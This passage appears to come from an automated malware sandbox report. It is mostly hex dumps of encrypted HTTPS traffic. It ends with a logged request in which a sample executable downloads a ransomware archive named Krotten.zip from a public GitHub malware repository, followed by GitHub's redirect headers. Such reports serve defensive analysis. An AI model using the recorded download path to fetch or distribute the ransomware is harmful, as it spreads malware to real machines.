                                                                                                        2022-09-29 12:45:13 UTC1126INData Raw: 83 73 b0 d0 97 e9 d5 91 20 a8 75 5f 89 ca c0 3c cb cf ab 92 02 48 cc 93 79 f7 7f ef 9d 0d 51 27 36 c9 1e f2 fb 33 34 45 da 34 ee df 72 6f 9d 6c 81 f8 0b 6a 90 64 b0 11 9d 8d a8 e4 5e f2 06 b8 e0 99 d8 ae 1c 53 3b 02 f4 9f 25 08 e5 2e fa 21 f7 55 ca 85 2d db 15 7e f6 63 79 45 25 73 55 34 60 f0 7d b7 be cc 99 24 b2 44 43 4e 7e d8 5a ea f2 07 f0 3f 89 fd e5 41 79 3c 2f 45 96 11 d5 a8 30 2f 48 16 65 e7 f5 0c 2f 27 a2 22 c3 bf 40 1e 20 82 ae d4 d7 26 c5 8e 0f 3e e8 08 d6 96 5a 53 ec 6a 12 25 ba 09 a0 f6 59 40 d6 23 85 b8 67 54 c8 2b 72 32 bc 3f d1 45 16 f8 58 bd 17 45 f7 db df c2 44 3d 9c bd 6d 39 d0 87 29 e5 42 f4 46 09 91 94 91 e2 49 92 1b 80 a2 69 b0 ca 5d d2 3c c6 e3 e0 9e bf 99 e7 4b 70 87 3f 1b a5 bd 8b 2d 51 e6 3c c1 95 e5 0e 7e 71 d7 20 64 4d c6 f9 e8
                                                                                                        Data Ascii: s u_<HyQ'634E4roljd^S;%.!U-~cyE%sU4`}$DCN~Z?Ay</E0/He/'"@ &>ZSj%Y@#gT+r2?EXED=m9)BFIi]<Kp?-Q<~q dM
                                                                                                        2022-09-29 12:45:13 UTC1127INData Raw: db 99 4f 7c b3 82 0a 49 3b b5 da ea 1c a7 f8 15 b3 46 4d 0d 18 0f 55 02 6e d7 57 f2 b8 ff 2e 63 8d 8d ee 59 32 6c fb a4 85 2a 97 e3 54 d7 1f f9 42 0b a3 26 a5 1d 2f b5 b1 90 2e c5 64 61 41 21 04 06 dd c3 6a 07 2e 44 4c 33 89 06 db 94 ba 19 d2 af 6b f5 5a c6 b3 4c 7b e1 46 66 92 45 8a fb cc e6 32 5e f3 88 3b 93 cf 42 a0 bd b2 2d 38 4b 16 3f 05 ff 17 89 25 57 d1 0f 85 92 c8 cf 67 02 ce 83 ab 62 17 7e 00 24 15 4e 7a 45 6b 50 d1 e6 72 01 f0 68 00 14 fb 10 8b 26 d8 d5 5d 2f 7b 2c aa 54 c3 a7 6e cf 57 82 46 9e 44 c8 a6 52 31 0d f6 51 e4 25 1b fc 26 4c ed 91 fe 93 c3 ab d8 fd 87 48 ee a6 e6 fa c1 40 bd c6 a3 5f b9 c3 44 84 99 31 79 3a 50 fe ef 2c 8a 39 e3 be 00 63 02 08 41 07 b0 0f 3f 6b 00 12 07 55 4b 18 c1 46 ad 37 9a aa 72 b9 0f cc a2 6d 7f f7 ae 5b cd 1f 7a
                                                                                                        Data Ascii: O|I;FMUnW.cY2l*TB&/.daA!j.DL3kZL{FfE2^;B-8K?%Wgb~$NzEkPrh&]/{,TnWFDR1Q%&LH@_D1y:P,9cA?kUKF7rm[z
                                                                                                        2022-09-29 12:45:13 UTC1129INData Raw: 2a 3d 20 1c b5 5d cf 26 11 d1 0d 35 1b 93 f3 6e c9 7c 21 ef 65 8b 5e b4 8e e3 af 0c 71 1e f9 75 e7 57 43 f5 c6 6c 79 16 e1 0c b8 7f 3c 93 34 a1 55 be 19 26 2c 21 d9 27 62 7e 87 18 c2 a2 c9 cb 02 9a ab 99 9c b8 ed 23 ef d4 93 0a fd 7f 85 37 4c 4c 3b 8a 1e 48 5b d6 3b 07 a9 fa 21 b6 ff 59 d1 f9 86 2f e3 e7 d5 3b 03 ed 5b ea 21 59 8d f8 c7 ed e3 f5 7e a8 4a 22 b1 e9 5a 52 fb b0 15 f2 49 92 ee 3e 3a 39 59 33 54 80 d1 74 4d 86 e0 d3 13 5e a9 bd 68 93 5f 8f 91 65 5e 69 bd 4e eb 14 b8 37 0d ca 26 02 cf 88 31 cb 07 a8 54 69 b2 5b 4f 9a a0 fd f5 75 a2 fa cb e8 1b b6 11 8c 15 ca 02 7d 9c 3d 6f 99 7d d5 41 61 d7 a6 76 09 08 da 83 05 64 34 a9 b2 4f d7 e4 8f e7 df 99 2e b6 61 cb 63 a3 0f d3 88 d5 44 ef 29 15 49 44 de c3 68 4d db db 5f bd 70 a1 63 d7 f8 b7 57 f8 86 f7
                                                                                                        Data Ascii: *= ]&5n|!e^quWCly<4U&,!'b~#7LL;H[;!Y/;[!Y~J"ZRI>:9Y3TtM^h_e^iN7&1Ti[Ou}=o}Aavd4O.acD)IDhM_pcW
                                                                                                        2022-09-29 12:45:13 UTC1130INData Raw: db a5 a1 d2 dc ed 13 11 30 ca 6e f3 e0 6e 3a 16 87 a6 7b 8d d4 bc 3d f7 e6 d5 0f fa e8 0f dd 1e 82 da 76 42 98 c5 99 ed 46 87 3d ec c2 7a a0 d7 ed f8 35 a7 3c de 27 f6 54 fa 5f 55 c1 28 62 c0 c0 e8 a6 f4 05 5d 4f e1 0e ba 5b af 05 fe f2 ef c2 be 8f 42 76 9f 9b fd b2 32 cc 0f 7e 83 3a 60 c8 7b f6 b2 00 70 05 1b c4 cc b2 4b e9 13 64 c2 62 0d da f1 1b 85 ad 5f bc 77 94 ca bf 51 da e7 0e 69 ae 4c 73 e1 65 98 be 6a 11 b2 ab 1e e7 d8 29 8b 43 8f 94 e8 08 63 91 a2 96 37 62 b9 ab e1 e7 82 59 2d ed d6 90 f3 a9 39 36 ae e7 53 08 f2 23 1b 12 f1 a8 b3 1c 2d 5f 2e ab 05 9e fc ce 70 10 8f c0 c2 95 aa c8 76 0f d2 08 31 29 93 ee 4e fb 4f a2 12 e8 3d b3 82 ed 71 55 93 3f 0e 26 18 d1 69 5d 7a 30 ee a0 8f 07 9d 9e d3 9e 44 3f c2 49 88 87 58 f8 4e 7a fc 3c 02 25 4e 4c 40 63
                                                                                                        Data Ascii: 0nn:{=vBF=z5<'T_U(b]O[Bv2~:`{pKdb_wQiLsej)Cc7bY-96S#-_.pv1)NO=qU?&i]z0D?IXNz<%NL@c
                                                                                                        2022-09-29 12:45:13 UTC1131INData Raw: c2 fd 4b ab b8 f6 1e b3 d2 d6 2a 5c 2e 3e 2c 8a 31 59 2a 4d 1a 11 3b cf 84 48 02 6c 98 09 92 ed e6 1c 1b b5 52 98 89 4b 9e 59 e3 7f ac d7 44 18 70 7c db 52 c8 85 f7 d4 85 21 e7 55 ed 88 17 5c 7d 29 20 86 fc 64 da 87 d9 0c 92 93 2c ee 5f 60 8a 8c f6 72 bf de 22 26 fc f2 e7 4c e3 cb 46 15 3d ae f0 e7 78 3d 5e c0 2e d8 9c 40 54 c7 47 b9 c3 a2 f8 79 d1 98 98 ad b7 e4 b0 b8 28 b2 fe d3 97 f5 db c3 bd 64 b0 f2 d6 95 13 4a 4f 7c 17 ea 8c 3f 55 ff af 14 f0 46 b4 80 de 6e bb d4 3c 08 f5 4a 15 b8 ca 56 17 f5 c7 6a e0 0c 76 5d 1d 4a b4 0c 71 0f 10 2d db 8b d3 bf 36 b4 ef ac 29 cf 3f 45 69 89 30 e5 18 72 d5 8b e5 83 be fc 73 3b e3 15 45 e7 7b 18 8a 65 31 ed b6 53 5a cd c5 3b cd 41 73 99 2d 3d 7f 12 45 2f df 4c 24 d8 4f c8 30 d2 d1 67 27 2a 73 71 33 44 55 99 e2 ae be
                                                                                                        Data Ascii: K*\.>,1Y*M;HlRKYDp|R!U\}) d,_`r"&LF=x=^.@TGy(dJO|?UFn<JVjv]Jq-6)?Ei0rs;E{e1SZ;As-=E/L$O0g'*sq3DU
                                                                                                        2022-09-29 12:45:13 UTC1133INData Raw: 24 92 fe fc 77 e2 29 9c a9 12 46 cd 25 85 c0 aa 9f be dc b3 0c 6d 8e 0d 41 6a 3d 0d 28 a2 fa e4 db 06 3f 63 2b fb ce 1b e5 5d 42 cf 4b 1f f4 85 8a a5 d5 2b 04 fe 2a 55 fc 0e f9 dd 5e 8c e5 e1 d2 fc 7b c5 6a 0b bd 88 04 5c 08 1d ef f4 b5 33 8e 07 4a e9 80 01 0b 42 74 19 2b f3 b0 43 07 a4 d0 a4 99 d6 f8 b9 45 26 6a 6c bd f9 00 89 47 52 53 cc 8e 56 79 5c f0 cf 82 41 c0 6d 17 a0 ff 67 2c 2a 4a 37 b6 e2 31 17 af ae c9 e0 60 4d e5 7f 7b 83 49 66 5c 07 3c 68 f2 c6 83 0f 78 99 0e 39 b7 ef a0 08 6a 10 db 96 43 e6 f5 26 2d b1 f9 9f b0 94 ef 3b d2 05 dc 6b e5 e4 12 82 eb a3 80 2b 50 db 9b 9e 24 32 9f 21 b8 0f b8 cb 2b 2b 9c 2c f0 0c f7 47 c7 39 a9 cb b9 e6 a0 2c 34 03 f9 fe 1e 38 ca ff 27 2f 9c 35 62 74 1c 38 50 39 7e d4 bd f7 19 a9 34 5b d1 9b 93 52 c8 cd ff 16 b2
                                                                                                        Data Ascii: $w)F%mAj=(?c+]BK+*U^{j\3JBt+CE&jlGRSVy\Amg,*J71`M{If\<hx9jC&-;k+P$2!++,G9,48'/5bt8P9~4[R
                                                                                                        2022-09-29 12:45:13 UTC1134INData Raw: 25 88 e4 fb 23 04 4f 1e 93 c9 60 78 0c d6 76 57 92 e6 c1 4f d2 0a 57 c2 17 8e 75 c6 4d e4 23 b3 95 3c f7 b5 07 67 78 75 de 8e b5 3f 98 85 d0 57 6f 4b 80 46 8e 1a 54 60 c8 eb 75 1e e0 8f 99 bb 52 7e 47 9d 88 e4 c5 9d 82 d7 9b 1e 5f 48 32 75 de c9 97 c1 f4 75 5a 80 97 21 67 72 b7 f7 1f 5e fa 9e a4 d7 e2 7f ff 07 cf e9 e6 e2 43 2e f4 10 45 fd f4 ab a0 88 d2 10 8a 49 c3 25 66 f0 82 b7 bd ee 8b 4f 19 f8 1f 46 e2 0b b6 db d0 16 0d 99 cf 35 44 f6 c5 8a 01 44 d1 20 6d 7e 0e 5f 0a ec 1b f0 85 a8 2b 78 36 03 77 54 ed 64 93 f1 af 88 99 c1 fd 26 fc 5f 41 e6 2e 2e 93 ba 43 5e b8 cc 53 85 26 26 79 f7 69 79 fb 24 32 fd 0e 67 8b 65 88 d7 f2 58 dc fa 80 07 84 01 a9 f0 33 e2 10 ba 3f b1 e2 02 d9 8f b5 bf bf 0e 69 3a ef 50 09 af 73 3d 27 b0 3d ff 83 60 f9 5e b0 ad 8f 91 73
                                                                                                        Data Ascii: %#O`xvWOWuM#<gxu?WoKFT`uR~G_H2uuZ!gr^C.EI%fOF5DD m~_+x6wTd&_A..C^S&&yiy$2geX3?i:Ps='=`^s
                                                                                                        2022-09-29 12:45:13 UTC1135INData Raw: 9a 66 0e fd 8f 95 94 b2 46 bc 84 2f df 4e d4 2e d2 7d 0a da a0 12 54 ea 5e 03 30 b8 2a 13 c0 ab 3f 39 ce c2 d7 37 cd d0 66 33 b2 b0 97 57 4b c7 9e f5 06 f9 4b 09 0f 5c d5 c3 97 ee e6 eb 4f 94 ce a0 0f 54 0e 91 8a 5b e7 51 4a 55 c8 94 db e2 83 33 3d b0 01 9d 2c be 0c 02 f1 2b 71 f6 d3 fc 2c ea 51 dc 7c 88 c2 49 c8 05 12 73 e6 11 9e b2 f9 85 6d f2 fb d1 c4 37 a9 4e ea b4 24 e8 38 42 fe d8 bf fc fc 54 95 e7 e1 fd 3a 8f 40 72 93 53 e1 e0 1b 2b 7d da 89 8b 19 a2 e0 b8 13 a1 e0 b5 5d 1d 77 73 40 14 af 8c 8a 27 04 74 00 ad 8c 97 4e 7f 34 5c 88 56 12 9a c8 f5 e8 51 72 04 3a 0e 03 eb f8 f3 8c e5 6d b5 23 93 82 69 cd 4a 88 d8 06 51 cc a9 a2 b1 3a 74 0c a7 fe 36 a6 bf cc 8e f4 ff 7f a6 db 72 7c ca bd e2 ab 73 60 ad a7 12 25 ea bf a4 d7 2d 58 5f 4a 7b a6 4c 5f c5 1d
                                                                                                        Data Ascii: fF/N.}T^0*?97f3WKK\OT[QJU3=,+q,Q|Ism7N$8BT:@rS+}]ws@'tN4\VQr:m#iJQ:t6r|s`%-X_J{L_
                                                                                                        2022-09-29 12:45:13 UTC1137INData Raw: 12 6c e3 a3 b4 64 5d 9a 89 31 de 52 d2 e6 70 e6 c2 a0 10 ad 9b b4 55 1c 0b 42 af 85 02 a6 2b 0e 31 6f 15 d1 2f 99 71 d4 16 40 b9 34 20 31 20 3f 1f 54 7c 61 7e 7a 6a 21 d5 ac 8f c7 37 f3 e0 04 ab e6 f6 db cc ab 70 79 cb 0e 2d e8 c2 73 10 68 ae 88 87 ec 85 eb 7b 91 82 06 56 aa 36 2d d2 72 6e 87 08 c8 a8 bb d1 46 56 89 97 a2 7d ad 0d 24 11 2d 0c 05 ca 17 6d c0 a3 06 64 52 7c 93 52 ff d4 40 77 4f 00 40 ee da b6 d1 48 70 f2 c1 86 4a df e6 d2 0c 51 22 f1 b1 ca ce a8 a5 9a 1c a2 04 c9 0c ea 98 9a e1 01 de ca 21 3c 88 bb 4d e4 51 b2 fe 0a 11 7c e0 48 41 15 d0 f6 c3 8d b8 24 27 86 8d 40 aa d1 28 54 19 e7 26 da 7f a3 65 57 00 1f 3b c6 67 c6 d3 20 9a 7a 93 32 e7 1a 69 a9 5a df 40 72 63 d5 ad 4d 5d 94 f4 53 e4 32 3c b6 97 56 8d 7c da 76 32 dc 47 76 ab ef f7 17 f9 4e
                                                                                                        Data Ascii: ld]1RpUB+1o/q@4 1 ?T|a~zj!7py-sh{V6-rnFV}$-mdR|R@wO@HpJQ"!<MQ|HA$'@(T&eW;g z2iZ@rcM]S2<V|v2GvN
                                                                                                        2022-09-29 12:45:13 UTC1138INData Raw: 67 07 2e e4 72 1c 2e f7 44 d7 94 19 62 36 3b c3 7e 23 ce 89 35 8a 82 10 11 c8 92 e0 27 8b d4 b4 7b 95 15 84 3b 65 d1 63 fd 82 c2 77 b1 c7 0f 22 7a 8a 0f 65 e6 4a 94 2c 29 4b 73 9f de 17 0b 55 c4 02 bb 6d 4a 00 be ec e6 b3 7c c1 68 f2 03 56 c9 bb 2f 40 df 26 c3 8b 2c ca 4f 7d 8c 06 4e bc dd 7a 3a c0 b5 81 ff 43 76 7a 41 f0 32 ff 83 e0 af 9c ab ae 4d 47 0e 12 a7 b1 31 e2 f2 2c 99 95 15 af 81 3d 23 bd 1e 38 7a 40 44 70 10 80 ad 7a 4d 34 79 29 12 75 0c f0 4a ed 00 32 8a fc 84 fb 30 43 7d da e5 0d 19 d1 26 75 9a 32 7d 62 b3 f4 a0 ed f6 34 fc 82 27 7e 30 3a 3f 3b 0d 20 99 2e 85 b8 a4 4b 6d 18 64 3b 11 fc 22 1e 17 ab 7b 8b f2 62 af ba 20 f4 53 d6 a3 c5 1a e4 47 da d4 0c 23 f3 a7 60 d6 ae 06 26 dd 5f 06 bd e4 93 47 ad 73 fe 1e 94 0c 56 9c 30 4a 93 02 b0 c0 e3 22
                                                                                                        Data Ascii: g.r.Db6;~#5'{;ecw"zeJ,)KsUmJ|hV/@&,O}Nz:CvzA2MG1,=#8z@DpzM4y)uJ20C}&u2}b4'~0:?; .Kmd;"{b SG#`&_GsV0J"
                                                                                                        2022-09-29 12:45:13 UTC1139INData Raw: 35 f5 8e 24 0c 44 c7 62 96 b4 1c 9e de 54 4a 32 fd 6f 5d 5d 16 35 27 5a 12 2e 5d a8 6b ad af d0 d1 b9 cc c9 12 09 2e ee b2 94 3d 0c 7d 89 38 a8 56 ca 35 8f 05 de 09 44 66 a2 fc 9f 34 be f5 de 18 fd 8c db 46 06 2a ef 5d 76 6a f8 22 8c 08 0e 68 17 5f 67 11 da 5c 13 16 71 89 b1 a2 ac ef bc 4a 61 9f 74 c7 5f 40 12 8f 5c 8c 76 c4 8f f2 c8 ee fe b1 00 f1 f1 2a 1d c5 31 2f 5e 63 ab 43 73 c0 b7 5c e2 3d 03 9e dc 80 f9 7b ad ec e1 e7 84 9d 65 ff e4 85 2c 59 8d 2b 15 50 46 11 74 27 f0 7a b5 51 73 51 d0 7f 86 7f 3c 7c a7 bd ea af bf 73 31 53 07 e2 4e c9 19 69 52 33 80 1c 58 5f a2 9b 8a 7e 6f 5e dc 68 e6 5a 46 c8 d8 0a 8d 5b c4 95 53 ba 44 af 23 ec 4a 8b 82 d8 a2 29 cc aa 84 94 bd b9 97 29 0d f0 96 25 47 35 da 24 4c f4 9e 1a 24 14 9f 6e f7 35 15 0a d2 09 00 21 39 aa
                                                                                                        Data Ascii: 5$DbTJ2o]]5'Z.]k.=}8V5Df4F*]vj"h_g\qJat_@\v*1/^cCs\={e,Y+PFt'zQsQ<|s1SNiR3X_~o^hZF[SD#J))%G5$L$n5!9
                                                                                                        2022-09-29 12:45:13 UTC1141INData Raw: fc d0 c7 e3 c0 a9 87 b5 19 b7 18 b8 19 75 4f b9 f3 31 01 54 03 66 c6 d3 c9 aa 58 14 fb 32 67 4c 72 34 dc 6a 52 31 73 30 6a a9 b3 5a 23 90 b7 7e 34 9d 1e dd a2 67 57 d5 46 4a 16 64 e0 58 76 e9 29 8b 09 f3 b1 a6 66 5d 0c b8 30 1c 92 6e 12 b4 62 7b 5e 48 30 fc e5 00 ee 57 a3 f5 9e 2f 85 0b 3e f8 d9 02 4e ce 8b 5a e4 12 48 13 12 9a c1 c1 cd 97 25 3f 1b 05 d1 00 79 5a ee c7 e1 93 a4 13 bf 00 2a 63 aa aa 6c 96 e0 e1 c0 4c df f8 70 94 de 0b ab 24 05 2a 28 5b 7d 8a 5b 88 1d 07 69 0f f6 83 bc bf 4b 64 f9 dd 41 fa d7 30 27 d1 b6 a4 ea aa 97 ff 15 29 81 e4 05 18 d0 d0 13 a5 c6 80 5e 27 ca dd f3 c9 17 ed f1 83 9d 2b 50 b5 33 6c 67 07 2a 5f 34 8f fa 97 43 fc ad 14 3c 3e f7 26 40 bb 02 24 bf e9 37 87 63 b6 2c da 76 d0 a8 2a 8b 69 00 b2 96 c2 51 1a 63 35 78 2b 76 d8 97
                                                                                                        Data Ascii: uO1TfX2gLr4jR1s0jZ#~4gWFJdXv)f]0nb{^H0W/>NZH%?yZ*clLp$*([}[iKdA0')^'+P3lg*_4C<>&@$7c,v*iQc5x+v
                                                                                                        2022-09-29 12:45:13 UTC1142INData Raw: d1 05 3a 8c 59 a6 b0 c3 09 8a 36 7e 25 46 14 07 53 76 e2 44 ef 79 47 7c 0b da 8f bb 07 67 47 f2 e7 66 32 a3 c4 e8 10 1a 7a da e6 80 9c dd 44 f4 35 63 d7 64 a0 43 69 c9 e0 91 21 b5 96 ab 95 e0 da d8 a8 a5 a3 75 fa 72 5b 97 6c 1c 23 48 d2 a9 25 5a e2 84 e3 5c 13 81 f2 4e 19 d7 91 c0 58 ba a6 31 ba 4f b7 1e 72 ab b0 ff d7 91 be 24 dc 27 a5 e1 00 4d bd 59 97 8f f6 85 c0 0b 02 61 79 0e 23 a3 73 10 fd 22 92 a8 f6 f5 3d d1 7c e7 8c a5 a4 f4 b7 76 18 ec 64 84 e4 85 61 01 3f 7c e6 4b c5 5b e7 dc 96 1a 76 db 32 0d 7a 1b de 0d 2d a9 c9 ba d0 1a 5a 35 db 4e f0 06 56 3a ca d4 a5 58 0e 66 71 4c de 86 d8 2a 1c d5 a4 99 6c 0c 03 03 f6 b8 44 11 02 46 c5 95 6f fd 64 f7 b4 32 3c 4e f5 b5 a3 d2 4b 7e 6a a6 93 ab 2d d6 8e 4f 14 81 d5 29 2c da 79 ac 30 7a 4e 19 6d c4 9d 9c de
                                                                                                        Data Ascii: :Y6~%FSvDyG|gGf2zD5cdCi!ur[l#H%Z\NX1Or$'MYay#s"=|vda?|K[v2z-Z5NV:XfqL*lDFod2<NK~j-O),y0zNm
                                                                                                        2022-09-29 12:45:13 UTC1143INData Raw: 9d e9 26 66 0b c0 be a2 8a f2 b5 49 97 8b 71 fe 8c 57 af 97 c6 37 17 62 a2 47 11 ba c7 55 ef ba 63 b6 74 06 4f 4d 35 99 81 02 8a 76 18 a0 32 4a 64 53 d3 bf 05 55 ca 03 ac fc 77 e4 4f 90 d3 e0 c5 c1 75 e5 33 6f 92 85 38 36 00 fd ea 92 e9 d9 da 56 e0 6d 2e ec c6 ed 92 62 f1 45 40 ef 69 14 2c 83 49 05 bc f0 45 5c 70 2d 2a e2 38 82 3e 86 c3 d7 62 25 f6 46 f5 6e 71 4c 47 25 ec 0b 80 d5 96 c2 7d 0f 2d c7 00 55 c1 d7 56 de cd 35 4b b5 9b 06 87 4b 03 85 d2 13 f5 46 8f da 9e 76 88 a4 29 40 97 b0 15 99 b5 22 d4 a1 af ee 8b d5 78 96 e1 10 a8 18 1e e4 8f 2c d5 85 13 57 f1 e6 d2 a8 29 63 56 03 ea 12 23 4e e1 18 15 77 ba 2c 36 5f 67 d5 6f 58 7d 86 23 b4 22 32 0e 05 ee 2e c5 37 ef 5c c0 12 d5 9b d0 a9 d1 64 61 69 ad 91 37 73 fa 16 37 b1 60 4b 84 e5 ef 64 25 a6 ab 8b fb
                                                                                                        Data Ascii: &fIqW7bGUctOM5v2JdSUwOu3o86Vm.bE@i,IE\p-*8>b%FnqLG%}-UV5KKFv)@"x,W)cV#Nw,6_goX}#"2.7\dai7s7`Kd%
                                                                                                        2022-09-29 12:45:13 UTC1145INData Raw: b7 59 6a c0 79 dc 53 40 76 b2 72 ae bc 89 15 cd 23 2c 1e 0d 7f aa 04 e6 fb 87 d0 50 72 0c 4b 41 ab c0 ba 75 54 dd d8 77 0a 60 7c b3 8b 45 a5 14 03 9e 92 e5 a4 97 a2 cc 83 d0 f8 e8 49 25 64 1b 0e 54 e0 48 9b 4e 02 f1 51 37 be 63 03 a3 96 e3 59 5d 35 a9 7e d8 96 e2 d2 22 d3 49 02 62 20 2c af 4f 2f dc 12 ba ec ae 0a d4 a4 5a 39 62 bc 0a 0b 0c 78 f4 3d 3a 96 d1 cd 1d da fe 87 6f f3 d5 cc 5f fd a8 c5 cf ea e6 02 c6 4b 92 83 b7 d3 28 27 6f cf 20 b8 8b 16 55 88 a8 ed da e0 c7 49 ef 13 df 90 0a eb 22 2a 57 a0 05 21 02 85 00 5a c6 ee 23 51 88 b0 41 b1 0d e8 7a 5d e7 98 20 eb 8a e5 2a 09 55 c0 7c 28 f6 59 d8 fc 3d fe d1 8a 52 99 5d 19 ae 08 ba df ee c4 8a 9d 8f e0 6d 75 ed 0b 3c 63 a3 f3 de ae 2a 81 1d 39 f7 5b 50 44 73 f6 d9 08 61 80 03 af 89 a6 01 cc f2 ae 55 f6
                                                                                                        Data Ascii: YjyS@vr#,PrKAuTw`|EI%dTHNQ7cY]5~"Ib ,O/Z9bx=:o_K('o UI"*W!Z#QAz] *U|(Y=R]mu<c*9[PDsaU
                                                                                                        2022-09-29 12:45:13 UTC1146INData Raw: 59 68 ed 48 0b 4b 60 bb d2 44 31 04 9a 18 60 1e 68 b7 97 2a 8c 3f 6c b4 11 c6 3c 2c 4c 70 f1 40 ee 0b a5 b0 03 07 e5 09 49 a9 3d 28 3c 73 d4 67 17 cd b3 97 4b 8d c5 c0 be e1 a6 79 12 12 df 9e 8f 9e b5 fa e4 68 68 41 20 e3 c4 f5 a8 4d ec 28 93 3c 10 78 48 be 06 01 00 3c 14 af eb 98 8e 24 79 a5 7d 04 4e 2f f5 4e ff a4 b7 6b 64 78 86 9e 66 8e b6 86 58 fd 3c 50 61 70 9a e0 02 78 96 63 98 5d fc c4 23 53 fd 80 4b 2d 7a a0 73 4a 75 e1 b1 4b f3 cd b0 f7 11 8d 33 0d b6 6a 30 d7 26 fd 5c fb a7 e2 cc 34 ea 91 de c8 3f a0 76 ec d7 32 83 0a 95 2d 53 01 e4 8d c9 2c 43 8f 0f 00 0a 80 90 fc 32 4f f6 77 53 dd 44 96 3a 6f f5 01 66 12 1c 3b a7 eb b7 3c e5 3e eb 4b 8f 91 4a ca dc 35 0e 21 af e2 df 2e 39 3e f6 f0 3f ec 43 c0 7d e9 06 bb 66 fe 5e 8f 9c c1 a9 41 d6 31 ff cb 2a
                                                                                                        Data Ascii: YhHK`D1`h*?l<,Lp@I=(<sgKyhhA M(<xH<$y}N/NkdxfX<Papxc]#SK-zsJuK3j0&\4?v2-S,C2OwSD:of;<>KJ5!.9>?C}f^A1*
                                                                                                        2022-09-29 12:45:13 UTC1148INData Raw: 60 6a d3 38 e0 a9 a6 98 c6 d4 8f c5 71 2d 02 b2 f1 d3 8f 27 61 5d 43 6e a0 79 00 f8 09 58 78 93 a2 c1 8d 3c 38 fd 65 92 00 4d 1b c2 59 b0 a2 7a c2 5e 5d a7 99 17 ea 2c d9 c4 d2 fd ed 33 5a 14 a2 4e 45 2b 7c 97 c7 fc e7 6c c9 c8 59 b5 8f dd f2 c5 30 f8 35 1f 6e f5 08 c1 7a fd c4 29 3f b9 3a 43 fa ef c0 d7 39 0c 5f fa 22 61 cb 49 f1 06 a9 fc 40 47 46 13 62 5a 55 79 43 e2 80 db 9a c6 d0 cc 66 5c 23 bb 21 b4 44 9f 11 43 80 8a 90 9d c5 55 0b a8 d2 eb 35 20 e8 72 dc ac 16 5e 6b f4 53 0a 89 49 7c 18 86 58 73 52 06 5d e5 2f bd 0f 90 29 9c b5 19 cf 1b 1e 03 ec 8d 13 ea cb c2 4d 87 dd 18 22 06 52 de 7e a9 24 96 71 67 54 ee a6 35 05 bc 8a 01 cd 35 a0 a1 c9 fb e1 e6 c1 61 ea cb ac 99 a5 1a 61 0b 2f 93 ec 0e 2e b1 f6 5a 25 7f 16 ec ce 65 20 97 37 c0 fc 98 16 40 16 5e
                                                                                                        Data Ascii: `j8q-'a]CnyXx<8eMYz^],3ZNE+|lY05nz)?:C9_"aI@GFbZUyCf\#!DCU5 r^kSI|XsR]/)M"R~$qgT55aa/.Z%e 7@^
                                                                                                        2022-09-29 12:45:13 UTC1149INData Raw: e7 90 e3 3c ac 3b 94 69 03 8f 11 d4 e1 bc 85 c2 be dd 36 41 cc 1b ba 0c 59 86 0f 33 96 9b 38 6b 74 68 42 5c e3 55 81 20 bc c9 e9 35 be 3f 1e 8c b6 82 d1 c4 42 48 d7 45 d2 65 e9 a3 35 15 20 94 67 87 1d 7e 12 74 d4 4d 32 b3 eb 69 a1 46 71 59 22 33 b2 54 0e 18 d9 2c f1 e8 95 a4 8c 64 ba 66 db 2c 07 ad f4 70 6c 09 c5 d4 b9 63 a0 d5 35 fb 81 93 da cc d1 e3 ad 7c d5 8d 35 44 66 78 d0 fa de 95 98 c7 c9 91 2a c1 f1 fb 35 63 65 3b 4d a7 30 ec 40 c5 ad e1 23 8a 79 66 2f 52 b1 28 b7 76 73 f2 ab 3b 4a e0 f4 60 60 fb ad 50 28 6c b1 51 ee cd 69 5b f7 29 ae 4f 35 01 70 4d 35 8f 2d a1 df 57 cc f6 5d b9 3c 40 e1 f5 4a 47 1b 95 4f 60 43 1c 70 a0 7e e1 ab 04 3a a2 01 93 41 ec f2 e6 6b 02 82 22 97 91 8d a4 df 67 48 ee 77 00 e2 c2 ec aa 9c 8b d1 28 07 6a 70 c9 75 18 d0 d6 72
                                                                                                        Data Ascii: <;i6AY38kthB\U 5?BHEe5 g~tM2iFqY"3T,df,plc5|5Dfx*5ce;M0@#yf/R(vs;J``P(lQi[)O5pM5-W]<@JGO`Cp~:Ak"gHw(jpur


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        12192.168.2.449720140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:14 UTC1150OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:14 UTC1150INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:09 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:14 UTC1151INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 